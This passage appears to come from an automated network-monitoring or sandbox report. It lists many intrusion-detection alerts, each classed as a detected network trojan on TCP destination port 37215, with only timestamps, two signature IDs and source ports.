          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302479
          SID:2835222
          Source Port:43896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730922
          SID:2835222
          Source Port:44982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354827
          SID:2829579
          Source Port:57464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274416
          SID:2835222
          Source Port:40386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261372
          SID:2835222
          Source Port:38446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857924
          SID:2829579
          Source Port:33378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893862
          SID:2835222
          Source Port:60590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005648
          SID:2835222
          Source Port:48758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150863
          SID:2829579
          Source Port:45470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667118
          SID:2835222
          Source Port:44932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056639
          SID:2835222
          Source Port:39558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470656
          SID:2835222
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862310
          SID:2829579
          Source Port:33934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014487
          SID:2835222
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168300
          SID:2835222
          Source Port:41396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356591
          SID:2835222
          Source Port:40626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787357
          SID:2829579
          Source Port:50738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606000
          SID:2835222
          Source Port:54530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084949
          SID:2835222
          Source Port:39692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468940
          SID:2829579
          Source Port:42312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549292
          SID:2829579
          Source Port:47696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158839
          SID:2829579
          Source Port:48006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464891
          SID:2835222
          Source Port:56406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810473
          SID:2835222
          Source Port:44940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462798
          SID:2829579
          Source Port:37888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410640
          SID:2835222
          Source Port:42694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176618
          SID:2835222
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741002
          SID:2835222
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812621
          SID:2829579
          Source Port:45350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356393
          SID:2835222
          Source Port:48970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041131
          SID:2835222
          Source Port:46442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442076
          SID:2835222
          Source Port:57232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447193
          SID:2829579
          Source Port:35848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747304
          SID:2835222
          Source Port:59160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747363
          SID:2829579
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107194
          SID:2835222
          Source Port:55218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514531
          SID:2835222
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517801
          SID:2829579
          Source Port:54214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444806
          SID:2829579
          Source Port:40244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551640
          SID:2829579
          Source Port:35598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168403
          SID:2829579
          Source Port:50492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888737
          SID:2829579
          Source Port:54446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734402
          SID:2835222
          Source Port:36920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150772
          SID:2829579
          Source Port:38070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732984
          SID:2835222
          Source Port:33594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109160
          SID:2829579
          Source Port:52318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449219
          SID:2835222
          Source Port:50310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131115
          SID:2829579
          Source Port:46462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832524
          SID:2829579
          Source Port:41228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022074
          SID:2835222
          Source Port:57388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462841
          SID:2829579
          Source Port:33678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157134
          SID:2829579
          Source Port:37078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462321
          SID:2835222
          Source Port:36106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861773
          SID:2829579
          Source Port:48274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041195
          SID:2829579
          Source Port:46638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549568
          SID:2835222
          Source Port:57234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513306
          SID:2829579
          Source Port:51918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510316
          SID:2835222
          Source Port:53210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545666
          SID:2835222
          Source Port:36410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265903
          SID:2829579
          Source Port:49690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555354
          SID:2829579
          Source Port:38514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394652
          SID:2835222
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602086
          SID:2835222
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161210
          SID:2829579
          Source Port:45748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355092
          SID:2835222
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038244
          SID:2829579
          Source Port:50684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261393
          SID:2829579
          Source Port:35018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896355
          SID:2835222
          Source Port:49992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259806
          SID:2829579
          Source Port:46692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746926
          SID:2829579
          Source Port:43234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020239
          SID:2829579
          Source Port:60930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152344
          SID:2835222
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740978
          SID:2829579
          Source Port:57530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107747
          SID:2829579
          Source Port:56168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807571
          SID:2829579
          Source Port:40978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834307
          SID:2829579
          Source Port:34392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402395
          SID:2829579
          Source Port:42454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276235
          SID:2835222
          Source Port:51090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670193
          SID:2829579
          Source Port:60600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461988
          SID:2835222
          Source Port:32848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109412
          SID:2829579
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509146
          SID:2829579
          Source Port:54704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890660
          SID:2835222
          Source Port:43402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353289
          SID:2835222
          Source Port:43408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172584
          SID:2835222
          Source Port:43772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791722
          SID:2829579
          Source Port:42656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555254
          SID:2829579
          Source Port:38264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749001
          SID:2829579
          Source Port:55760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736935
          SID:2835222
          Source Port:57032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156056
          SID:2835222
          Source Port:52856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160411
          SID:2829579
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130680
          SID:2829579
          Source Port:54476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236548
          SID:2835222
          Source Port:43804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466905
          SID:2835222
          Source Port:37044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172688
          SID:2835222
          Source Port:39276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042071
          SID:2835222
          Source Port:41920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894849
          SID:2829579
          Source Port:46034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599599
          SID:2835222
          Source Port:33156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272903
          SID:2829579
          Source Port:48122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.814188
          SID:2829579
          Source Port:39834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792034
          SID:2835222
          Source Port:45970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192500
          SID:2829579
          Source Port:37140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860709
          SID:2835222
          Source Port:47736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820837
          SID:2829579
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862989
          SID:2829579
          Source Port:43896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837630
          SID:2829579
          Source Port:51694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270856
          SID:2829579
          Source Port:54344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854733
          SID:2835222
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161360
          SID:2835222
          Source Port:43614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.594921
          SID:2835222
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555389
          SID:2835222
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783094
          SID:2829579
          Source Port:58832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808161
          SID:2829579
          Source Port:52654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107420
          SID:2835222
          Source Port:54344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179875
          SID:2835222
          Source Port:56184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807081
          SID:2829579
          Source Port:52852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405814
          SID:2835222
          Source Port:37954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071467
          SID:2835222
          Source Port:50638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179082
          SID:2829579
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264610
          SID:2835222
          Source Port:58554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.364842
          SID:2835222
          Source Port:47410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884180
          SID:2835222
          Source Port:35824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496082
          SID:2829579
          Source Port:44226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784068
          SID:2835222
          Source Port:57160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162664
          SID:2835222
          Source Port:53534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554239
          SID:2835222
          Source Port:56158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738850
          SID:2835222
          Source Port:46632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403904
          SID:2829579
          Source Port:33816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509667
          SID:2829579
          Source Port:57184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883925
          SID:2829579
          Source Port:37992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747341
          SID:2829579
          Source Port:48688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707814
          SID:2835222
          Source Port:37264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860998
          SID:2835222
          Source Port:53872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861443
          SID:2835222
          Source Port:38560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061951
          SID:2829579
          Source Port:35946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239679
          SID:2835222
          Source Port:40306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518005
          SID:2835222
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797339
          SID:2829579
          Source Port:55298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.735484
          SID:2835222
          Source Port:34898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745336
          SID:2829579
          Source Port:40950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108475
          SID:2829579
          Source Port:37248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268622
          SID:2835222
          Source Port:36140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179381
          SID:2829579
          Source Port:52564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161237
          SID:2829579
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107942
          SID:2829579
          Source Port:49384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131786
          SID:2829579
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671343
          SID:2829579
          Source Port:43736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259200
          SID:2829579
          Source Port:53298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163178
          SID:2829579
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511363
          SID:2829579
          Source Port:34900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176258
          SID:2829579
          Source Port:53580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442385
          SID:2829579
          Source Port:39640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542627
          SID:2829579
          Source Port:36988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176275
          SID:2829579
          Source Port:34094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241279
          SID:2835222
          Source Port:36804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820908
          SID:2835222
          Source Port:59788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175739
          SID:2835222
          Source Port:48158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404989
          SID:2829579
          Source Port:50448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707375
          SID:2835222
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733408
          SID:2829579
          Source Port:44618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264327
          SID:2829579
          Source Port:34716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183806
          SID:2829579
          Source Port:60898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602969
          SID:2835222
          Source Port:47310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170592
          SID:2835222
          Source Port:46138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738786
          SID:2835222
          Source Port:59560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709146
          SID:2829579
          Source Port:47964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744248
          SID:2835222
          Source Port:45532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465437
          SID:2829579
          Source Port:40900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888087
          SID:2835222
          Source Port:58830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266515
          SID:2835222
          Source Port:53312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797786
          SID:2835222
          Source Port:53976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884612
          SID:2835222
          Source Port:38446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071138
          SID:2829579
          Source Port:54414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163272
          SID:2835222
          Source Port:35364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351774
          SID:2835222
          Source Port:49790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892097
          SID:2835222
          Source Port:50816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150251
          SID:2835222
          Source Port:47330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110836
          SID:2829579
          Source Port:40640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729605
          SID:2829579
          Source Port:43832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038125
          SID:2835222
          Source Port:46214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.176291
          SID:2829579
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547348
          SID:2829579
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517111
          SID:2835222
          Source Port:45474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827452
          SID:2829579
          Source Port:45832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175978
          SID:2829579
          Source Port:60946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708666
          SID:2835222
          Source Port:34440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099543
          SID:2829579
          Source Port:59592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075100
          SID:2835222
          Source Port:58934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040545
          SID:2829579
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673795
          SID:2829579
          Source Port:52094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116827
          SID:2835222
          Source Port:39580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106115
          SID:2835222
          Source Port:42530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178518
          SID:2835222
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020388
          SID:2829579
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.734140
          SID:2835222
          Source Port:34662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738027
          SID:2835222
          Source Port:41504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177497
          SID:2835222
          Source Port:35984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
